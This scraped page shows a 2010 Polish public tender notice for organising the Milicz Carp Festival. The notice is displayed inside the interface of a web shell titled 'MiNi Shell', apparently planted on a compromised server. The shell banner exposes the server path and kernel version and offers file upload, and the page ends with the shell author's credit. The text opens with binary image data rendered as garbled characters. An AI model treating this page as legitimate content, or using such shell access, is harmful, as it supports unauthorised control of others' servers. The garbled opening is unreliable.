JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100428/118764-N-2010.html

<p class="kh_header"><b>Milicz: Kompleksowa organizacja i realizacja imprezy plenerowej - obchodów Święta Karpia Milickiego 2010</b><br>
<b>Numer ogłoszenia: 118764 - 2010; data zamieszczenia: 28.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Milicki , ul. Wojska Polskiego 38, 56-300 Milicz, woj. dolnośląskie, tel. 071 3840704, faks 071 3840704.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.milicz-powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa organizacja i realizacja imprezy plenerowej - obchodów Święta Karpia Milickiego 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa organizacja i realizacja imprez plenerowych - obchodów Święta Karpia Milickiego 2010 oraz imprez towarzyszących: Odłowów w zakresie artystycznym, rekreacyjno-rozrywkowym, gastronomicznym i usługowo-handlowym.

Zakres usług przewidzianych do wykonania obejmuje w szczególności przygotowanie i zorganizowanie dwóch imprez plenerowych o charakterze rodzinnym i biesiadnym dla różnych grup wiekowych:

I.	 Kompleksowej organizacji obchodów Święta Karpia Milickiego:
1.	w dniu 4  lub 11  września 2010 r. od godz. 14.00 do godz. 24.00
2.	w dniu 5 lub 12 września 2010 r. od godz. 12.00 do godz. 22.00
na terenie miasta Milicz, obejmującym teren stadionu przy Zespole Szkół Leśnych w Miliczu, ul. Kasztelańska, 
3.	planowana ilość uczestników: minimum 5000 osób, 

W ramach działania wymagane jest  między innymi:
1.	Przygotowanie oferty artystycznej obejmującej propozycje dla różnych grup wiekowych:
2.	 Występy gwiazd polskiej sceny muzycznej (np. Lady Pank, Maryla Rodowicz, Zespół Perfect, Zespół Budka Suflera, Zespół Zakopower, Zespół Brathanki lub inne równoważne - akceptowalne przez zamawiającego), każdy z dni Święta Karpia Milickiego winien kończyć koncert innego artysty/zespołu (gwiazdy wieczoru). Wykonawca zobowiązany jest zaoferować co najmniej dwie gwiazdy rozpoznawalne na rynku ogólnopolskim. 
3.	Występ dwóch polskich kabaretów rozpoznawalnych co najmniej na rynku regionalnym.
4.	Występy co najmniej dwóch zespołów folkowych.
5.	Organizacja historycznego widowiska, składającego się z II części, część I inscenizacja podczas obchodów ŚKM - nawiązująca tematyką do historii Stawów Milickich, karpia, Doliny Baryczy, część II inscenizacja podczas Odłowów, przedstawiająca odłowy na stawach wczoraj i dziś.
6.	Występy lokalnych wykonawców, zaproponowanych przez zamawiającego.
-	Organizacja dwudniowej Biesiady rybnej podczas obchodów ŚKM, w ramach której, planowane jest tradycyjne, coroczne gotowanie wielkiego gara (minimum 2500 litrów) zupy rybnej Polewka Rybna z Doliny Baryczy, którą częstowani będą goście uczestniczący w obchodach Święta Karpia Milickiego - wykonawca zapewnia półprodukty, organizację stanowisk i sprzętu gastronomicznego. Ponadto przewiduje się organizacje corocznego konkursu Mistrz Karpia z udziałem dziecięciu restauratorów z Doliny Baryczy - wykonawca pokrywa koszty półproduktów i organizacji stanowisk, a także wspólne przyrządzanie potraw rybnych z dwoma mistrzami kulinarnymi. 
-	Przygotowanie techniki estradowej zgodnie z wymogami zaproponowanych artystów (scena 10 x 13 m, nagłośnienie, oświetlenie, konstrukcje na banery reklamowe (stack), co najmniej jeden ekran diodowy o powierzchni minimum 15 m2, zawieszony na wysokości nie mniej niż 2,5 m, akustycy, konferansjerzy) włącznie z niezbędnym zapleczem technicznym i garderobami dla wykonawców programu artystycznego.
-	Określenie terminu rozpoczęcia montażu techniki estradowej i ostatecznego zakończenia jej demontażu oraz określenie terminu montażu i demontażu innych urządzeń i stoisk na terenie objętym organizacją imprezy.
-	Przygotowanie jarmarku rybnego oraz produktów lokalnych we współpracy z lokalnymi producentami oraz organizacjami pozarządowymi, promującymi markę Dolina Baryczy poleca - wykonawca zapewnia odpowiednie stoiska - co najmniej 20.
-	Przygotowanie podczas obchodów ŚKM Strefy dla Najmłodszych tj. miejsca aktywności twórczej dla dzieci, w którym odbywać się będą konkursy, gry i zabawy.
-	Przygotowanie Lunaparku obejmującego, co najmniej 2 atrakcyjne urządzenia (karuzele) dla różnych grup wiekowych (od 3 lat wzwyż), posiadające stosowne i aktualne atesty sprawności technicznej, które będą obsługiwane przez osoby posiadające odpowiednie kwalifikacje i przeszkolenie.
-	Przygotowanie na terenach objętych imprezami (w miejscach uzgodnionych z Zamawiającym) estetycznych punktów tzw. małej gastronomii.
-	Zapewnienie podczas imprezy dwóch namiotów, 100 stołów oraz odpowiednio miejsc siedzących dla uczestników imprezy.
-	Przygotowanie i zapewnienie działań zgodnie z obowiązującymi wymogami zawartymi w Ustawie o bezpieczeństwie imprez masowych, na cały czas trwania imprez, na terenach objętych jej realizacją, w szczególności w zakresie:
a/ 	zabezpieczenia imprezy oraz ochrony ludzi i sprzętu przez licencjonowaną Agencję Ochrony (w tym również w godzinach nocnych),
b/ 	ustawienia toalet przenośnych, 
c/ 	dostawy energii elektrycznej i wody, 
d/ 	sprzątania i wywozu nieczystości, 
e/ 	stałego utrzymania porządku i higieny, 
f/ 		ubezpieczenia imprezy,
g/	płacenia tantiem ZAiKS-u z tytułu organizacji Obchodów zgodnie z obowiązującymi w tym zakresie przepisami.
-	Propozycje zorganizowania innych atrakcji koniecznie z wykorzystaniem elementów historii Stawów milickich i Karpia milickiego oraz Doliny Baryczy.
-	Dodatkowe atrakcje na zakończenie Święta Karpia Milickiego np. pokaz laserowy, pokaz sztucznych ogni.
-	Przeprowadzenie akcji informacyjno-promocyjnej m.in. w prasie i internecie dla obchodów Święta Karpia Milickiego 2010. Wszystkie materiały promocyjne i informacyjne, muszą posiadać symbole Unii Europejskiej wraz z odpowiednią treścią o udzielonym wsparciu.

II.	Organizacji odłowów na terenie stawów milickich w dniu 2 października 2010 r. od godz. 12.00 do godz. 20.00 na terenie Stawów Milickich, planowana ilość uczestników: minimum 2000 osób. 
W ramach działania wymagane jest między innymi między innymi:

1.	Przygotowanie oferty artystycznej obejmującej propozycje dla różnych grup wiekowych:
2.	 Występ zespołu folkowego.
3.	Organizacja historycznego widowiska, składającego się z II cześci, część I inscenizacja podczas obchodów ŚKM - nawiązująca tematyką do historii Ziemi milickiej, część II inscenizacja podczas Odłowów, przedstawiająca odłowy na stawach wczoraj i dziś.
4.	Występy lokalnych wykonawców, zaproponowanych przez zamawiającego.

-	Przygotowanie techniki estradowej (scena 5 x 5 m, nagłośnienie, oświetlenie) włącznie z niezbędnym zapleczem technicznym.
-	Przygotowanie jarmarku rybnego oraz produktów lokalnych we współpracy z lokalnymi producentami, promującymi markę Dolina Baryczy poleca - wykonawca zapewnia odpowiednie stoiska - co najmniej 20.
-	Przygotowanie Strefy dla Najmłodszych tj. miejsca aktywności twórczej dla dzieci, w którym odbywać się będą konkursy, gry i zabawy.
-	Przygotowanie na terenach objętych imprezami (w miejscach uzgodnionych z Zamawiającym) estetycznych punktów tzw. małej gastronomi.
-	Zapewnienie podczas imprezy jednego namiotu, 30 stołów oraz odpowiednio miejsc siedzących dla uczestników imprezy.
-	Przygotowanie i zapewnienie działań zgodnie z obowiązującymi wymogami zawartymi w Ustawie o bezpieczeństwie imprez masowych, na cały czas trwania imprez, na terenach objętych jej realizacją, w szczególności w zakresie:
a/ 		zabezpieczenia imprezy oraz ochrony ludzi i sprzętu przez licencjonowaną Agencję Ochrony,
b/ 		ustawienia toalet przenośnych, 
c/ 		dostawy energii elektrycznej i wody, 
d/ 		sprzątania i wywozu nieczystości, 
e/ 		stałego utrzymania porządku i higieny, 
f/ 		ubezpieczenia imprezy,
g/opłacenia tantiem ZAiKS-u z tytułu organizacji Obchodów zgodnie z obowiązującymi w tym zakresie przepisami.
-	Propozycje zorganizowania innych atrakcji koniecznie z wykorzystaniem elementów historii Stawów milickich i Karpia milickiego oraz Doliny Baryczy.
-	Przeprowadzenie akcji informacyjno-promocyjnej m.in. w prasie i internecie dla Odłowów. Wszystkie materiały promocyjne i informacyjne, muszą posiadać symbole Unii Europejskiej wraz z odpowiednią treścią o udzielonym wsparciu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.21.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 04.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferty składane przez wykonawców zaproszonych do udziału w postępowaniu będą musiały być zabezpieczone wadium w wysokości:  5 000,00 zł  (słownie: pięć tysięcy złotych)

Wadium będzie mogło zostać wniesione w następujących formach:
1.	w pieniądzu (wyłącznie przelewem na rachunek bankowy zamawiającego),
2.	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	w gwarancjach bankowych,
4.	w gwarancjach ubezpieczeniowych,
5.	w poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.  Nr 109, poz.1158 z późn. zm.).

Wadium wnoszone w formie pieniądza będzie wpłacane na konto Zamawiającego: 
nr 519582 0000 2000 0000 0550 0012
z dopiskiem:
	Święto Karpia Milickiego

	Wadium wnoszone w innej formie niż w pieniądzu należy złożyć w oryginale, w siedzibie Zamawiającego w Sekretariacie, pok. nr 14 ( I piętro )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek podstawowy - wykonawca zrealizował w okresie 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na organizacji koncertu/imprezy o wartości nie mniejszej niż 500.000,00 zł. brutto - za spełnienie tego warunku wykonawca otrzyma 50 punktów

Warunek dodatkowy - wykonawca posiada udokumentowane doświadczenie w organizacji imprez masowych o charakterze kulturalno-rozrywkowym adresowanych do co najmniej 5000 osób, dla której przedłożono dokument potwierdzający należyte wykonanie usługi:
- za każdą imprezę adresowaną do 5.000-10.000 osób: dodatkowo 5 punktów
- za każdą imprezę adresowaną do powyżej 10.000 osób: dodatkowo 10 punktów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, zamawiający uzna pisemne oświadczenie Wykonawcy w tym zakresie (załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, zamawiający uzna pisemne oświadczenie Wykonawcy w tym zakresie (załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, zamawiający uzna pisemne oświadczenie Wykonawcy w tym zakresie (załącznik nr 2).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Ocena poziomu wiedzy i doświadczenia wykonawcy odbędzie się poprzez zsumowanie liczy otrzymanych punktów.

W przypadku, jeśli kilku wykonawców otrzyma taką samą najwyższą liczbę punktów, a ilość tych wykonawców przekroczy zakładaną przez zamawiającego ilość wykonawców, którzy zostaną zaproszeni do składania ofert, ma zastosowanie przepis art. 57. ust. 3 U.PZP - zamawiający zaprosi do składania ofert wstępnych wykonawców, którzy otrzymali najwyższe oceny spełniania tych warunków.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.milicz-powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.milicz-powiat.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2010 godzina 10:00, miejsce: w siedzibie Starostwa Powiatowego w Miliczu ul. Wojska Polskiego 38, 56-300 Milicz w Sekretariacie, pok. Nr 14 ( I piętro ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego  
w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com